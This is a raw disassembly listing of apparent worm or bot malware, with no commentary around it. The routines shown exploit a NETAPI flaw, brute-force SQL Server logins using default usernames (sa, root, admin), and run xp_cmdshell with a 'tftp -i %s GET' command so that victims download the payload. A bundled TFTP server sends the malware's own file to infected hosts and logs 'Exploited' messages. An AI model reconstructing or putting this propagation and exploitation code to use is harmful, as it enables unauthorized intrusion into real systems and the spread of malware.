		mov	esi, offset dword_4267FC
		movsd
		movsw
		add	eax, 7
		movsb
		mov	[esp+14h+arg_14], eax
		xor	eax, eax
		mov	[esp+14h+arg_200], bl
		lea	edi, [esp+14h+arg_201]
		stosd
		stosd
		stosd
		stosw
		stosb
		add	esp, 0Ch
		mov	edi, 0FFh
		push	edi
		lea	eax, [esp+0Ch+arg_311]
		push	ebx
		push	eax
		mov	[esp+14h+arg_310], bl
		call	sub_408130
		add	esp, 0Ch
		push	edi
		lea	eax, [esp+0Ch+arg_211]
		push	ebx
		push	eax
		mov	[esp+14h+arg_210], bl
		call	sub_408130
		add	esp, 0Ch
		call	sub_419FC7
		test	al, al
		jnz	short loc_41B81B
		push	dword_428D1C
		lea	esi, [esp+0Ch+arg_200]
		call	sub_419C46
		lea	esi, [esp+0Ch+arg_310]
		mov	ebx, offset aDfstcvDsd ; "τ"
		mov	[esp+0Ch+var_C], 100h
		call	sub_41A33D
		pop	ecx
		mov	eax, esi
		push	eax
		push	dword_4288F4
		lea	eax, [esp+10h+arg_200]
		push	eax
		push	offset aHttpSDS_0 ; "http://%s:%d/%s"
		lea	eax, [esp+18h+arg_210]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [esp+20h+arg_210]
		add	esp, 18h
		lea	ecx, [eax+1]

loc_41B809:				; CODE XREF: sub_41B423+3EBj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41B809
		sub	eax, ecx
		mov	[esp+eax+8+arg_210], dl
		jmp	short loc_41B832
; ---------------------------------------------------------------------------

loc_41B81B:				; CODE XREF: sub_41B423+388j
		push	100h
		lea	esi, [esp+0Ch+arg_210]
		mov	ebx, offset aIxxsCccUioxgud ; "ΖϓςΓ΍τ"...
		call	sub_41A33D
		pop	ecx

loc_41B832:				; CODE XREF: sub_41B423+3F6j
		lea	eax, [esp+8+arg_210]
		push	eax
		call	sub_414FA3
		mov	esi, eax
		test	esi, esi
		pop	ecx
		jz	loc_41BAE0
		push	esi
		push	1
		call	sub_414D82
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_41B86A
		push	esi
		push	2
		call	sub_414D82
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	loc_41BAE0

loc_41B86A:				; CODE XREF: sub_41B423+433j
		mov	esi, [esp+8+arg_8]
		dec	eax
		push	eax
		mov	eax, [esp+0Ch+arg_14]
		add	eax, esi
		push	offset byte_437508
		push	eax
		call	sub_4081B0
		mov	eax, [esp+14h+arg_1C]
		mov	eax, dword_42680C[eax]
		add	esp, 0Ch
		cmp	[esp+8+arg_C], 1
		jnz	short loc_41B8C1
		mov	ecx, dword_4376C8
		mov	[eax+esi], ecx
		mov	ecx, dword_426824
		add	eax, 0Ch
		mov	[eax+esi], ecx
		mov	ecx, dword_426824
		lea	eax, [eax+esi+24h]
		mov	[eax], ecx
		mov	ecx, dword_426824
		mov	[eax+0Ch], ecx
		jmp	short loc_41B8DB
; ---------------------------------------------------------------------------

loc_41B8C1:				; CODE XREF: sub_41B423+470j
		cmp	[esp+8+arg_C], 0
		jnz	short loc_41B8DB
		push	10h
		add	eax, esi
		pop	ecx

loc_41B8CD:				; CODE XREF: sub_41B423+4B6j
		mov	edx, dword_426824
		mov	[eax], edx
		add	eax, 4
		dec	ecx
		jnz	short loc_41B8CD

loc_41B8DB:				; CODE XREF: sub_41B423+49Cj
					; sub_41B423+4A3j
		mov	edi, [esp+8+arg_10]
		add	edi, 42h
		push	edi
		call	sub_403C6E
		mov	ebx, eax
		test	ebx, ebx
		pop	ecx
		jz	loc_41BAF6
		push	edi
		push	0
		push	ebx
		call	sub_408130
		push	5
		pop	ecx
		lea	esi, [esp+14h+arg_94]
		mov	edi, ebx
		rep movsd
		mov	esi, [esp+14h+arg_10]
		mov	eax, esi
		test	eax, eax
		mov	[esp+14h+arg_10], eax
		fild	[esp+14h+arg_10]
		jge	short loc_41B922
		fadd	ds:flt_422040

loc_41B922:				; CODE XREF: sub_41B423+4F7j
		fmul	ds:dbl_422038
		add	esp, 4
		fstp	[esp+10h+arg_10]
		fld	[esp+10h+arg_10]
		fstp	qword ptr [esp]
		call	sub_404380
		fstp	[esp+10h+arg_10]
		fld	[esp+10h+arg_10]
		call	sub_41CD16
		and	dword ptr [ebx+18h], 0
		push	esi
		push	[esp+14h+arg_8]
		mov	[ebx+1Ch], eax
		mov	[ebx+14h], eax
		lea	eax, [ebx+20h]
		push	eax
		call	sub_4081B0
		add	esp, 14h
		lea	eax, [esi+20h]
		jmp	short loc_41B969
; ---------------------------------------------------------------------------

loc_41B968:				; CODE XREF: sub_41B423+548j
		inc	eax

loc_41B969:				; CODE XREF: sub_41B423+543j
		test	al, 3
		jnz	short loc_41B968
		push	7
		lea	edi, [ebx+eax]
		pop	ecx
		push	[esp+8+arg_8]
		add	eax, 1Ch
		lea	esi, [esp+0Ch+arg_78]
		rep movsd
		mov	[esp+0Ch+arg_14], eax
		call	sub_403B91
		pop	ecx
		push	6
		xor	eax, eax
		pop	ecx
		lea	edi, [esp+8+arg_28]
		rep stosd
		mov	byte ptr [esp+8+arg_28+1], al
		mov	byte ptr [esp+8+arg_28+2], al
		lea	edi, [esp+8+arg_40]
		stosd
		xor	esi, esi
		stosd
		stosd
		push	esi
		push	esi
		stosd
		push	1
		push	esi
		mov	byte ptr [esp+18h+arg_28], 5
		mov	byte ptr [esp+18h+arg_28+3], 3
		mov	[esp+18h+arg_2C], 10h
		mov	word ptr [esp+18h+arg_30+2], si
		mov	[esp+18h+arg_34], esi
		mov	word ptr [esp+18h+arg_3C], si
		mov	word ptr [esp+18h+arg_3C+2], 1Fh
		stosd
		call	ds:off_41E09C
		mov	dword ptr [esp+8+arg_50], eax
		mov	byte ptr [esp+8+arg_0+3], 0
		mov	[esp+8+arg_8], esi

loc_41B9EA:				; CODE XREF: sub_41B423+659j
		cmp	[esp+8+arg_8], 2
		jge	loc_41BA82
		inc	[esp+8+arg_8]
		push	1
		push	10B8h
		push	[esp+10h+arg_14]
		lea	esi, [esp+14h+arg_28]
		push	ebx
		sub	esp, 18h
		push	6
		pop	ecx
		mov	edi, esp
		push	[esp+30h+arg_4]
		rep movsd
		call	sub_4179EC
		add	esp, 2Ch
		test	al, al
		jz	short loc_41BA82
		cmp	dword ptr [esp+8+arg_50], 0
		jz	short loc_41BA77
		lea	eax, [esp+8+arg_40]
		push	eax
		lea	eax, [esp+0Ch+arg_20]
		push	eax
		push	2000h
		lea	eax, [esp+14h+arg_4410]
		push	eax
		push	[esp+18h+arg_4]
		call	ds:off_41E078
		test	eax, eax
		jnz	short loc_41BA5C
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		cmp	eax, 3E5h
		jnz	short loc_41BA77

loc_41BA5C:				; CODE XREF: sub_41B423+62Aj
		push	3E8h
		push	dword ptr [esp+0Ch+arg_50]
		call	ds:off_41E07C
		cmp	eax, 102h
		jnz	short loc_41BA77
		mov	byte ptr [esp+8+arg_0+3], 1

loc_41BA77:				; CODE XREF: sub_41B423+605j
					; sub_41B423+637j ...
		cmp	byte ptr [esp+8+arg_0+3], 0
		jz	loc_41B9EA

loc_41BA82:				; CODE XREF: sub_41B423+5CCj
					; sub_41B423+5FEj
		push	[esp+8+arg_4]
		mov	esi, ds:off_41E0D8
		call	esi ; sub_4497E8
		push	ebx
		call	sub_403B91
		cmp	[esp+10h+arg_4C], 0
		pop	ecx
		jz	short loc_41BAA2
		push	[esp+0Ch+arg_4C]
		call	esi ; sub_4497E8

loc_41BAA2:				; CODE XREF: sub_41B423+677j
		cmp	byte ptr [esp+13h], 0
		jnz	short loc_41BB03
		cmp	[esp+0Ch+arg_8], 0
		jnz	short loc_41BAC9
		mov	[esp+0Ch+arg_8], 1
		xor	ebx, ebx
		jmp	loc_41B46F
; ---------------------------------------------------------------------------

loc_41BABF:				; CODE XREF: sub_41B423+1E5j
					; sub_41B423+2F7j
		push	[esp+8+arg_4]
		call	ds:off_41E0D8

loc_41BAC9:				; CODE XREF: sub_41B423+51j
					; sub_41B423+B9j ...
		xor	al, al

loc_41BACB:				; CODE XREF: sub_41B423+732j
		mov	ecx, [esp+0Ch+arg_6410]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_41BAE0:				; CODE XREF: sub_41B423+421j
					; sub_41B423+441j
		push	[esp+8+arg_4]
		call	ds:off_41E0D8
		push	[esp+0Ch+arg_4]

loc_41BAEE:				; CODE XREF: sub_41B423+6DEj
		call	sub_403B91
		pop	ecx
		jmp	short loc_41BAC9
; ---------------------------------------------------------------------------

loc_41BAF6:				; CODE XREF: sub_41B423+4CAj
		push	[esp+8+arg_4]
		call	ds:off_41E0D8
		push	esi
		jmp	short loc_41BAEE
; ---------------------------------------------------------------------------

loc_41BB03:				; CODE XREF: sub_41B423+684j
		push	[esp+0Ch+arg_20]
		call	ds:dword_41E25C	; inet_ntoa
		push	eax
		mov	eax, [esp+10h+arg_1EC]
		imul	eax, 2Ch
		add	eax, offset aNetapi ; "NETAPI"
		push	eax
		push	offset aSExploitedS_ ; "%s: Exploited: %s."
		lea	eax, [esp+18h+arg_EC]
		push	eax
		push	[esp+1Ch+arg_1F8]
		push	offset dword_428D1C
		call	sub_417FE1
		mov	eax, [esp+24h+arg_1EC]
		imul	eax, 2Ch
		lea	eax, dword_42554C[eax]
		add	esp, 18h
		inc	dword ptr [eax]
		mov	al, [esp+13h]
		jmp	loc_41BACB
sub_41B423	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=0CD8h


sub_41BB5A	proc near		; DATA XREF: .data:0042557Co

var_D54		= dword	ptr -0D54h
var_D50		= dword	ptr -0D50h
var_D4C		= dword	ptr -0D4Ch
var_D48		= dword	ptr -0D48h
var_D44		= byte ptr -0D44h
var_D40		= dword	ptr -0D40h
var_D3C		= dword	ptr -0D3Ch
var_D38		= dword	ptr -0D38h
var_D34		= dword	ptr -0D34h
var_D30		= dword	ptr -0D30h
var_D2C		= dword	ptr -0D2Ch
var_D26		= byte ptr -0D26h
var_D25		= byte ptr -0D25h
var_D24		= byte ptr -0D24h
var_C24		= dword	ptr -0C24h
var_C20		= dword	ptr -0C20h
var_C1C		= dword	ptr -0C1Ch
var_C18		= dword	ptr -0C18h
var_C14		= byte ptr -0C14h
var_814		= byte ptr -814h
var_414		= byte ptr -414h
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_4		= dword	ptr -4
arg_0		= byte ptr  8

		push	ebp
		lea	ebp, [esp-0CD8h]
		sub	esp, 0D54h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+0CD8h+var_4], eax
		push	ebx
		push	esi
		push	edi
		push	44h
		pop	ecx
		xor	ebx, ebx
		xor	eax, eax
		mov	[ebp+0CD8h+var_14], bl
		lea	esi, [ebp+0CD8h+arg_0]
		lea	edi, [ebp+0CD8h+var_D24]
		rep movsd
		lea	edi, [ebp+0CD8h+var_13]
		stosd
		stosd
		stosd
		stosw
		stosb
		mov	eax, [ebp+0CD8h+var_C20]
		mov	[ebp+0CD8h+var_D40], eax
		lea	eax, [ebp+0CD8h+var_D34]
		push	eax
		push	ebx
		push	1
		mov	[ebp+0CD8h+var_D26], bl
		mov	[ebp+0CD8h+var_D54], offset aSa	; "sa"
		mov	[ebp+0CD8h+var_D50], offset aRoot ; "root"
		mov	[ebp+0CD8h+var_D4C], offset aAdmin ; "admin"
		mov	[ebp+0CD8h+var_D48], ebx
		mov	[ebp+0CD8h+var_D25], bl
		mov	[ebp+0CD8h+var_D2C], ebx
		mov	[ebp+0CD8h+var_D30], ebx
		call	sub_402BB8
		test	ax, ax
		jz	short loc_41BBF4

loc_41BBDA:				; CODE XREF: sub_41BB5A+AEj
		xor	al, al

loc_41BBDC:				; CODE XREF: sub_41BB5A+CFj
		mov	ecx, [ebp+0CD8h+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		add	ebp, 0CD8h
		leave
		retn
; ---------------------------------------------------------------------------

loc_41BBF4:				; CODE XREF: sub_41BB5A+7Ej
		push	0FFFFFFFAh
		push	3
		push	0C8h
		push	[ebp+0CD8h+var_D34]
		call	sub_402BAC
		test	ax, ax
		jnz	short loc_41BBDA
		lea	eax, [ebp+0CD8h+var_D2C]
		push	eax
		push	[ebp+0CD8h+var_D34]
		push	2
		call	sub_402BB8
		test	ax, ax
		jz	short loc_41BC2B

loc_41BC1D:				; CODE XREF: sub_41BB5A+22Bj
		push	[ebp+0CD8h+var_D34]
		push	1
		call	sub_402BBE
		mov	al, bl
		jmp	short loc_41BBDC
; ---------------------------------------------------------------------------

loc_41BC2B:				; CODE XREF: sub_41BB5A+C1j
		mov	edi, ds:dword_41E25C
		lea	ecx, [ebp+0CD8h+var_D54]
		mov	[ebp+0CD8h+var_D3C], ecx

loc_41BC37:				; CODE XREF: sub_41BB5A+1D0j
		cmp	off_426830, ebx
		mov	[ebp+0CD8h+var_D38], ebx
		jz	loc_41BD1F
		mov	esi, [ecx]
		mov	eax, offset off_426830

loc_41BC4D:				; CODE XREF: sub_41BB5A+16Bj
		lea	ecx, [ebp+0CD8h+var_D26]
		push	ecx
		push	dword ptr [eax]
		push	esi
		push	[ebp+0CD8h+var_C1C]
		push	[ebp+0CD8h+var_D40]
		call	edi	; inet_ntoa
		push	eax
		lea	eax, [ebp+0CD8h+var_414]
		push	offset aDriverSqlServe ; "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
		push	eax
		call	sub_403643
		lea	eax, [ebp+0CD8h+var_414]
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_41BC7D:				; CODE XREF: sub_41BB5A+128j
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_41BC7D
		push	ebx
		sub	eax, ecx
		lea	ecx, [ebp+0CD8h+var_D44]
		push	ecx
		push	400h
		lea	ecx, [ebp+0CD8h+var_C14]
		push	ecx
		push	eax
		lea	eax, [ebp+0CD8h+var_414]
		push	eax
		push	ebx
		push	[ebp+0CD8h+var_D2C]
		call	sub_402BB2
		movzx	eax, ax
		cmp	ax, bx
		jz	short loc_41BCC9
		cmp	ax, 1
		jz	short loc_41BCC9
		inc	[ebp+0CD8h+var_D38]
		mov	eax, [ebp+0CD8h+var_D38]
		lea	eax, ds:426830h[eax*4]
		cmp	[eax], ebx
		jnz	short loc_41BC4D
		jmp	short loc_41BD1F
; ---------------------------------------------------------------------------

loc_41BCC9:				; CODE XREF: sub_41BB5A+154j
					; sub_41BB5A+15Aj
		lea	eax, [ebp+0CD8h+var_D30]
		push	eax
		push	[ebp+0CD8h+var_D2C]
		push	3
		call	sub_402BB8
		push	dword_428D1C
		lea	esi, [ebp+0CD8h+var_14]
		call	sub_419C46
		mov	eax, esi
		push	eax
		lea	eax, [ebp+0CD8h+var_814]
		push	offset aExecMaster__xp ; "EXEC master..xp_cmdshell 'tftp -i %s GE"...
		push	eax
		call	sub_403643
		add	esp, 10h
		push	0FFFFFFFDh
		lea	eax, [ebp+0CD8h+var_814]
		push	eax
		push	[ebp+0CD8h+var_D30]
		call	sub_402BC4
		test	ax, ax
		jz	short loc_41BD32
		push	[ebp+0CD8h+var_D30]
		push	3
		call	sub_402BBE

loc_41BD1F:				; CODE XREF: sub_41BB5A+E6j
					; sub_41BB5A+16Dj
		mov	ecx, [ebp+0CD8h+var_D3C]
		add	ecx, 4
		cmp	[ecx], ebx
		mov	[ebp+0CD8h+var_D3C], ecx
		jnz	loc_41BC37
		jmp	short loc_41BD78
; ---------------------------------------------------------------------------

loc_41BD32:				; CODE XREF: sub_41BB5A+1B9j
		push	[ebp+0CD8h+var_D40]
		mov	[ebp+0CD8h+var_D25], 1
		call	edi	; inet_ntoa
		push	eax
		mov	eax, [ebp+0CD8h+var_C24]
		imul	eax, 2Ch
		add	eax, offset aNetapi ; "NETAPI"
		push	eax
		push	offset aSExploitedS__0 ; "%s: Exploited	%s."
		lea	eax, [ebp+0CD8h+var_D24]
		push	eax
		push	[ebp+0CD8h+var_C18]
		push	offset dword_428D1C
		call	sub_417FE1
		mov	eax, [ebp+0CD8h+var_C24]
		imul	eax, 2Ch
		lea	eax, dword_42554C[eax]
		add	esp, 18h
		inc	dword ptr [eax]

loc_41BD78:				; CODE XREF: sub_41BB5A+1D6j
		push	[ebp+0CD8h+var_D2C]
		push	2
		call	sub_402BBE
		mov	bl, [ebp+0CD8h+var_D25]
		jmp	loc_41BC1D
sub_41BB5A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41BD8A	proc near		; DATA XREF: sub_41BF8C+15Ao

var_23C		= dword	ptr -23Ch
var_238		= dword	ptr -238h
var_230		= dword	ptr -230h
var_22C		= dword	ptr -22Ch
var_228		= dword	ptr -228h
var_224		= word ptr -224h
var_222		= word ptr -222h
var_220		= byte ptr -220h
var_18		= byte ptr -18h
var_14		= dword	ptr -14h
var_8		= dword	ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 240h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_8], eax
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		xor	ebx, ebx
		cmp	esi, ebx
		push	edi
		jnz	short loc_41BDB0

loc_41BDA9:				; CODE XREF: sub_41BD8A+42j
					; sub_41BD8A+5Dj ...
		push	ebx
		call	ds:off_41E10C

loc_41BDB0:				; CODE XREF: sub_41BD8A+1Dj
		lea	edi, [ebp+var_18]
		movsd
		movsd
		push	11h
		movsd
		push	2
		push	2
		movsd
		call	ds:dword_41E220	; socket
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+var_230], eax
		jz	short loc_41BDA9
		push	offset aRb	; "rb"
		push	offset dword_428D48
		call	sub_403782
		cmp	eax, ebx
		pop	ecx
		pop	ecx
		mov	[ebp+var_228], eax
		jz	short loc_41BDA9
		push	eax
		mov	[ebp+var_22C], ebx
		mov	[ebp+var_23C], 10h
		call	sub_404083
		test	eax, eax
		pop	ecx
		jnz	loc_41BEF8
		mov	esi, ds:dword_41E270

loc_41BE0E:				; CODE XREF: sub_41BD8A+168j
		push	204h
		lea	eax, [ebp+var_224]
		push	ebx
		push	eax
		call	sub_408130
		add	esp, 0Ch
		xor	eax, eax
		inc	[ebp+var_22C]
		push	[ebp+var_22C]
		lea	edi, [ebp+var_238]
		stosd
		call	esi	; htons
		push	3
		mov	[ebp+var_222], ax
		call	esi	; htons
		push	[ebp+var_228]
		mov	[ebp+var_224], ax
		push	200h
		lea	eax, [ebp+var_220]
		push	1
		push	eax
		call	sub_40430F
		mov	edi, [ebp+var_230]
		add	esp, 10h
		push	10h
		lea	ecx, [ebp+var_18]
		push	ecx
		push	ebx
		add	eax, 4
		push	eax
		lea	eax, [ebp+var_224]
		push	eax
		push	edi
		call	ds:dword_41E248	; sendto
		cmp	eax, 0FFFFFFFFh
		jz	loc_41BF74
		lea	eax, [ebp+var_23C]
		push	eax
		lea	eax, [ebp+var_18]
		push	eax
		push	ebx
		push	4
		lea	eax, [ebp+var_238]
		push	eax
		push	edi
		call	ds:dword_41E258	; recvfrom
		cmp	eax, 0FFFFFFFFh
		jz	loc_41BF74
		push	[ebp+var_238]
		call	ds:dword_41E250	; htons
		cmp	ax, 4
		jnz	loc_41BF74
		push	[ebp+var_238+2]
		call	ds:dword_41E250	; htons
		cmp	ax, word ptr [ebp+var_22C]
		jnz	loc_41BF74
		push	[ebp+var_228]
		call	sub_404083
		test	eax, eax
		pop	ecx
		jz	loc_41BE0E

loc_41BEF8:				; CODE XREF: sub_41BD8A+78j
		inc	dword_437384
		push	100h
		call	sub_402BD6
		mov	esi, eax
		push	esi
		call	sub_402FD3
		push	eax
		mov	ebx, offset aSiU ; "‘ғ"
		call	sub_41A33D
		add	esp, 0Ch
		push	dword_437384
		push	[ebp+var_14]
		call	ds:dword_41E25C	; inet_ntoa
		push	eax
		push	offset aTftpSendComple ; "TFTP:	Send Complete To %s. %d	Total Sen"...
		push	esi
		push	0
		push	offset dword_428D1C
		call	sub_417FE1
		push	esi
		call	sub_403129
		add	esp, 1Ch
		push	[ebp+var_230]
		call	ds:dword_41E280	; closesocket
		push	[ebp+var_228]
		call	sub_403A52
		pop	ecx
		mov	ecx, [ebp+var_8]
		pop	edi
		pop	esi
		xor	ecx, ebp
		xor	eax, eax
		pop	ebx
		call	sub_402C9E
		leave
		retn	4
; ---------------------------------------------------------------------------

loc_41BF74:				; CODE XREF: sub_41BD8A+100j
					; sub_41BD8A+125j ...
		push	edi
		call	ds:dword_41E280	; closesocket
		push	[ebp+var_228]
		call	sub_403A52
		pop	ecx
		jmp	loc_41BDA9
sub_41BD8A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41BF8C	proc near		; DATA XREF: sub_41C12F+53o

var_148		= dword	ptr -148h
var_144		= dword	ptr -144h
var_140		= dword	ptr -140h
var_13C		= dword	ptr -13Ch
var_138		= byte ptr -138h
var_134		= dword	ptr -134h
var_120		= dword	ptr -120h
var_11C		= dword	ptr -11Ch
var_14		= word ptr -14h
var_12		= word ptr -12h
var_10		= dword	ptr -10h
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 14Ch
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+14Ch+var_4], eax
		push	ebx
		push	esi
		push	edi
		push	11h
		xor	esi, esi
		push	2
		inc	esi
		push	2
		mov	[esp+164h+var_140], esi
		call	ds:dword_41E220	; socket
		cmp	eax, 0FFFFFFFFh
		mov	dword_428D44, eax
		jnz	short loc_41BFD5
		xor	ebx, ebx

loc_41BFC8:				; CODE XREF: sub_41BF8C+C1j
		mov	byte_43737D, bl

loc_41BFCE:				; CODE XREF: sub_41BF8C+BFj
		push	ebx
		call	ds:off_41E10C

loc_41BFD5:				; CODE XREF: sub_41BF8C+38j
		push	4
		lea	ecx, [esp+15Ch+var_140]
		push	ecx
		push	4
		push	0FFFFh
		push	eax
		call	ds:dword_41E24C	; setsockopt
		xor	eax, eax
		lea	edi, [esp+158h+var_14]
		stosd
		stosd
		stosd
		stosd
		push	45h
		mov	[esp+15Ch+var_14], 2
		call	ds:dword_41E270	; htons
		mov	[esp+158h+var_12], ax
		push	10h
		lea	eax, [esp+15Ch+var_14]
		push	eax
		push	dword_428D44
		xor	ebx, ebx
		mov	[esp+164h+var_10], ebx
		call	ds:dword_41E27C	; bind
		cmp	eax, 0FFFFFFFFh
		jnz	loc_41C0FE
		push	dword_428D44
		call	ds:dword_41E280	; closesocket
		cmp	byte_43737D, bl
		jz	short loc_41BFCE
		jmp	loc_41BFC8
; ---------------------------------------------------------------------------

loc_41C052:				; CODE XREF: sub_41BF8C+178j
		mov	eax, dword_428D44
		mov	[esp+158h+var_11C], eax
		xor	eax, eax
		lea	edi, [esp+158h+var_148]
		stosd
		stosd
		lea	eax, [esp+158h+var_148]
		push	eax
		push	ebx
		push	ebx
		lea	eax, [esp+164h+var_120]
		push	eax
		push	ebx
		mov	[esp+16Ch+var_120], esi
		mov	[esp+16Ch+var_148], 5
		mov	[esp+16Ch+var_144], ebx
		call	ds:dword_41E254	; select
		test	eax, eax
		jle	short loc_41C0FE
		xor	eax, eax
		lea	edi, [esp+158h+var_134]
		stosd
		stosd
		stosd
		stosd
		stosd
		lea	eax, [esp+158h+var_13C]
		push	eax
		lea	eax, [esp+15Ch+var_14]
		push	eax
		push	ebx
		push	14h
		lea	eax, [esp+168h+var_134]
		push	eax
		push	dword_428D44
		mov	[esp+170h+var_13C], 10h
		call	ds:dword_41E258	; recvfrom
		cmp	eax, 0FFFFFFFFh
		jz	short loc_41C0FE
		push	[esp+158h+var_134]
		inc	dword_437380
		call	ds:dword_41E250	; htons
		cmp	ax, si
		jnz	short loc_41C0FE
		lea	eax, [esp+158h+var_138]
		push	eax
		push	ebx
		lea	eax, [esp+160h+var_14]
		push	eax
		push	offset sub_41BD8A
		push	ebx
		push	ebx
		call	ds:off_41E090
		push	3E8h
		call	ds:off_41E0F8

loc_41C0FE:				; CODE XREF: sub_41BF8C+A7j
					; sub_41BF8C+FCj ...
		cmp	byte_43737D, bl
		jnz	loc_41C052
		push	dword_428D44
		call	ds:dword_41E280	; closesocket
		mov	ecx, [esp+158h+var_4]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		xor	eax, eax
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn	4
sub_41BF8C	endp


; =============== S U B	R O U T	I N E =======================================



sub_41C12F	proc near		; CODE XREF: .text:004024FEp
					; sub_41C7BA+3B2p
		push	4
		mov	eax, offset loc_41CE34
		call	sub_404B8C
		xor	ebx, ebx
		cmp	byte_43737D, bl
		jz	short loc_41C149

loc_41C145:				; CODE XREF: sub_41C12F+74j
		mov	al, 1
		jmp	short loc_41C1AD
; ---------------------------------------------------------------------------

loc_41C149:				; CODE XREF: sub_41C12F+14j
		mov	edi, 100h
		push	edi
		push	ebx
		mov	esi, offset dword_428D48
		push	esi
		call	sub_408130
		add	esp, 0Ch
		push	edi
		push	esi
		push	ebx
		call	ds:dword_41E0E0	; GetModuleHandleA
		push	eax
		call	ds:dword_41E060	; GetModuleFileNameA
		push	8
		call	sub_4035D9
		mov	esi, eax
		pop	ecx
		mov	[ebp-10h], esi
		cmp	esi, ebx
		mov	[ebp-4], ebx
		jz	short loc_41C195
		push	offset sub_41BF8C
		xor	ecx, ecx
		mov	edi, offset aTftpServer	; "TFTP	Server"
		call	sub_414D0E
		jmp	short loc_41C197
; ---------------------------------------------------------------------------

loc_41C195:				; CODE XREF: sub_41C12F+51j
		xor	eax, eax

loc_41C197:				; CODE XREF: sub_41C12F+64j
		cmp	[eax+4], ebx
		jz	short loc_41C1A5
		mov	byte_43737D, 1
		jmp	short loc_41C145
; ---------------------------------------------------------------------------

loc_41C1A5:				; CODE XREF: sub_41C12F+6Bj
		mov	byte_43737D, bl
		xor	al, al

loc_41C1AD:				; CODE XREF: sub_41C12F+18j
		call	sub_404C2B
		retn
sub_41C12F	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41C1B3	proc near		; CODE XREF: sub_40177B+6Cp
					; sub_4019F3+6Cp ...

var_3DC		= dword	ptr -3DCh
var_3D8		= byte ptr -3D8h
var_308		= byte ptr -308h
var_307		= byte ptr -307h
var_208		= byte ptr -208h
var_207		= byte ptr -207h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 3E0h
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+3E0h+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		mov	esi, 1FFh
		xor	ebx, ebx
		push	esi
		mov	[esp+3ECh+var_3DC], eax
		lea	eax, [esp+3ECh+var_207]
		push	ebx
		push	eax
		mov	[esp+3F4h+var_208], bl
		call	sub_408130
		add	esp, 0Ch
		push	0FFh
		lea	eax, [esp+3ECh+var_307]
		push	ebx
		push	eax
		mov	[esp+3F4h+var_308], bl
		call	sub_408130
		add	esp, 0Ch
		lea	eax, [esp+3E8h+var_3D8]
		call	sub_415020
		push	[esp+3E8h+var_3DC]
		lea	eax, [esp+3ECh+var_208]
		push	offset aS_16	; "%s"
		push	esi
		push	eax
		call	sub_40307C
		lea	eax, [esp+3F8h+var_208]
		add	esp, 10h
		lea	esi, [eax+1]

loc_41C240:				; CODE XREF: sub_41C1B3+92j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41C240
		lea	ecx, [esp+3E8h+var_3D8]
		push	ecx
		sub	eax, esi
		push	eax
		lea	ecx, [esp+3F0h+var_208]
		call	sub_4178E0
		push	200h
		lea	eax, [esp+3F4h+var_208]
		push	ebx
		push	eax
		call	sub_408130
		lea	eax, [esp+3FCh+var_308]
		add	esp, 14h
		push	eax
		lea	ebx, [esp+3ECh+var_3D8]
		call	sub_417760
		pop	ecx
		push	0C0h
		push	0
		push	edi
		call	sub_408130
		add	esp, 0Ch
		xor	esi, esi

loc_41C295:				; CODE XREF: sub_41C1B3+114j
		movzx	eax, [esp+esi+3E8h+var_308]
		push	eax
		push	edi
		push	offset aSX	; "%s%X"
		push	0BFh
		push	edi
		call	sub_40307C
		mov	eax, edi
		add	esp, 14h
		lea	ecx, [eax+1]

loc_41C2B7:				; CODE XREF: sub_41C1B3+109j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41C2B7
		sub	eax, ecx
		inc	esi
		cmp	esi, 40h
		mov	[eax+edi], dl
		jl	short loc_41C295
		mov	ecx, [esp+3E8h+var_4]
		pop	esi
		pop	ebx
		xor	ecx, esp
		mov	eax, edi
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn
sub_41C1B3	endp

; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		mov	eax, 1021Ch
		call	sub_4119C0
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+10218h], eax
		push	ebx
		push	esi
		mov	esi, [ebp+8]
		push	edi
		push	11h
		push	2
		mov	ecx, 85h
		lea	edi, [esp+30h]
		rep movsd
		push	2
		xor	esi, esi
		call	ds:dword_41E220	; socket
		mov	[esp+14h], eax
		xor	eax, eax
		lea	edi, [esp+18h]
		stosd
		stosd
		stosd
		stosd
		lea	eax, [esp+128h]
		push	eax
		mov	word ptr [esp+1Ch], 2
		call	ds:dword_41E264	; inet_addr
		cmp	eax, 0FFFFFFFFh
		mov	[esp+10h], eax
		jnz	short loc_41C36E
		lea	eax, [esp+128h]
